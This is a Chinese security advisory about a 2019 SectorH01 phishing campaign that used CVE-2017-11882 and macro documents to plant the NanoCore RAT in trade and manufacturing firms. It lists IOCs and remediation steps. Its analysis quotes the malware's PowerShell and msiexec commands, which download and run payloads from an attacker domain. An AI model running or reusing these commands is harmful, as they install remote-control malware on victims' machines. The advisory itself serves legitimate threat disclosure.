SectorH01攻擊組織釣魚郵件事件安全通告
發布時間 2019-09-22事件背景
近期檢測到SectorH01攻擊組織“商貿信”釣魚郵件攻擊在9月出現新一輪增長。在此次攻擊中,黑客精心構造的帶有office公式編輯器漏洞CVE-2017-11882或宏代碼的惡意文檔,將其作為附件批量發送至外貿行業企業郵箱中,在其打開文檔中招后植入遠控木馬NanoCore進行機密信息竊取和遠程控制,本次攻擊高峰時期每天成功投遞超3000個郵件地址。
事件描述
根據統計數據,有超過1000家企業受到此次攻擊影響,其中近一半以上分布在廣東、江蘇、浙江和上海四地,其中廣東占比超過30%。特別是廣東深圳和東莞由于制造業和外貿行業密集,成為本次攻擊受害最嚴重的區域。
從行業分布來看,“商貿信”攻擊目標主要集中在工業制造及貿易行業。統計數據顯示,被攻擊的88%為制造業,剩余12%是與制造業提供相關聯的銷售、運輸、商務服務行業。
事件分析
釣魚郵件主要通過偽造以下發件郵箱進行發送,其中使用最多的為
kieth@sdgtrading.co.uk
export@connect-distribution.co.uk
accounts@snapqatar.com
account@sh-seacare.com
banglore@scsplindia.com
pk3195@dataone.in
以其中一封郵件為例,從郵件頭部信息中可以看到發件人為“Keith Ward/SDG /UK”,發件郵箱地址為kieth@sdgtrading.co.uk。sdgtrading是一家總部位于英國的進出口貿易公司,目前打開該公司官方網站可以正常訪問。
貿易公司銷售人員信息
釣魚郵件
“訂購”、“價格”、“價目表”、“銷售條件”、“折扣”、“裝運日期”、“采購規格”等。
郵件中還指出郵件附件中包含“想要采購的產品條目”文檔,請閱讀后進行回復,部分文檔名如下:
RFQ015770082.doc
分析發現,附件文檔中包含Office公式編輯器漏洞CVE-2017-11882利用代碼或惡意宏代碼,經過漏洞攻擊或宏代碼執行過程,會觸發用于下載木馬的Powershell命令執行,進一步下載木馬:
'cmd.exe /c PowerShell "try{$tA=$env:temp+\'\\fo.exe\';Import-Module BitsTransfer;Start-BitsTransfer -Source \'hxxps://oppofile.duckdns.org/a/gmb.exe\' -Destination $tA;(New-Object -com Shell.Application).ShellExecute( $tA);}catch{}"'
除了利用Powershell,還有部分攻擊中使用Windows安裝程序(msiexec.exe)安裝MSI包文件進行木馬下載:
msiEXEc /i http[:]//oppofile.duckdns.org/d/dar.msi
從目前捕獲到的攻擊文檔中我們發現有以下木馬下載地址:
hxxp://oppofile.duckdns.org/c/dar.exe
hxxp://oppofile.duckdns.org/c/alex.exe
hxxp://oppofile.duckdns.org/c/go.exe
hxxps://oppofile.duckdns.org/a/gmb.exe
hxxps://oppofile.duckdns.org/a/alex.exe
hxxp://oppofile.duckdns.org/d/dar.msi
hxxp://oppofile.duckdns.org/e/scan.msi
hxxp://oppofile.duckdns.org/e/gmb.msi
遠控木馬
被下載植入的實際上是的經過混淆的遠控木馬NanoCore,NanoCore是使用.Net語言編寫的功能強大的遠程訪問控制木馬(RAT),可以在目標主機上進行文件操作,屏幕控制,運行指定程序,還支持插件擴展功能,被感染NanoCore木馬的電腦會出現嚴重信息泄露,攻擊者還可以利用中毒電腦為跳板,對目標網絡繼續進行滲透入侵。
核心模塊被加密后以位圖格式保存在資源文件
群發軟件
我們下載該軟件,并進行注冊和試用。根據其界面展示的功能,只需編寫好郵件內容(任意填寫發件人姓名)、批量添加收件人地址、點擊“開始群發”三步,即可將郵件快速發送至大批的目標郵箱中。
該軟件還有一個重要的功能是,支持從指定網站采集目標郵箱。該功能頁面默認的源網站地址為http[:]//www.****.biz/。我們嘗試使用該網站進行郵箱采集,在10分鐘之內可以采集到近800個郵箱地址,換算后一個小時之內可以采集到5000個郵箱,而這些被采集到的郵箱都存在被攻擊的可能。
可以看到這個默認的郵箱采集網站“**網”(www.*****.biz)是一個貿易信息發布平臺,大量廠商(機械、化工、電氣、能源、儀器等行業)在該網站上發布等各類產品的供應或求購信息。而每一條信息都會附帶廠商的電話、郵編、郵箱等聯系方式,“****郵件群發器”正是從這些信息中獲取了大量的郵箱地址。
攻擊思路
從以下幾個角度,我們認為黑客使用了郵件群發軟件“****郵件群發器”進行輔助攻擊:
2、受害企業類型與“****郵件群發器”默認采集郵箱類型一致(工業品貿易公司);
3、攻擊的影響范圍與該軟件的采集能力吻合(受害郵箱約3000個/日 & 軟件的采集能力約5000個/小時)。
推測黑客實施攻擊的思路如下:
1、黑客下載郵件群發軟件;
2、構造帶有CVE-2017-11882漏洞利用(或者宏代碼)的office惡意文件;
3、使用****郵件群發器從貿易分類信息網站批量采集目標郵箱地址;
4、使用準備好的惡意文檔作為附件,構造釣魚郵件并批量發送;
5、等待收件人打開附件并中招,通過遠控木馬NanoCore對目標進行遠程控制。
總結
在此次攻擊事件中可以發現,黑客與灰產從業人員出現了交集?;耶a人員開發出郵件群發工具,工具可針對網站上的公開郵箱進行爬取,可利用獲取到的郵箱進行批量群發郵件。工具在其注冊的“官網”上進行公開售賣,使用說明中“正義”地提到“僅用于正規郵件營銷,濫用者后果自負”。但工具一旦售出,便難以保證被用于合法用途。
而黑客獲得此軟件后,將其納入攻擊武器中的一員。隨后,只需編寫好木馬,構造釣魚郵件,就可以利用該工具將釣魚郵件自動化、大批量地發送至企業的相關郵箱中。
修復建議
1、企業郵箱網管將以下發件郵箱設置為黑名單
export@connect-distribution.co.uk
accounts@snapqatar.com
account@sh-seacare.com
banglore@scsplindia.com
pk3195@dataone.in
2、不要打開不明來源的郵件附件,對于附件中的文件要謹慎運行,如發現有腳本或其他可執行文件可先使用殺毒軟件進行掃描;
3、升級office系列軟件到最新版本,及時修復office程序漏洞,不要隨意運行不可信文檔中的宏;
4、推薦部署終端安全管理系統防御病毒木馬攻擊;
5、使用入侵檢測系統檢測未知黑客的各種可疑攻擊行為。
IOC
郵箱
export@connect-distribution.co.uk
accounts@snapqatar.com
account@sh-seacare.com
banglore@scsplindia.com
pk3195@dataone.in
郵件附件
11dd68ba724a7e34cdab1aae97a93190
3f36befc186d10551b5a4d65ac35978d
e4b1a5e14064e7c716530528e7615374
3f36befc186d10551b5a4d65ac35978d
1ffd02ef62e8feb788968518fe5fbdb2
a9958884c16f17c2c9e4d75f92117352
d6b697c64723909f0b357e2d49948905
a9958884c16f17c2c9e4d75f92117352
NanaCore木馬
453a235ad5ea7055f2af2c51c95a5bb2
域名
oppofile.duckdns.org
URL
hxxp://oppofile.duckdns.org/c/dar.exe
hxxp://oppofile.duckdns.org/c/alex.exe
hxxp://oppofile.duckdns.org/c/go.exe
hxxps://oppofile.duckdns.org/a/gmb.exe
hxxps://oppofile.duckdns.org/a/alex.exe
hxxp://oppofile.duckdns.org/d/dar.msi
hxxp://oppofile.duckdns.org/e/scan.msi
hxxp://oppofile.duckdns.org/e/gmb.msi
參考鏈接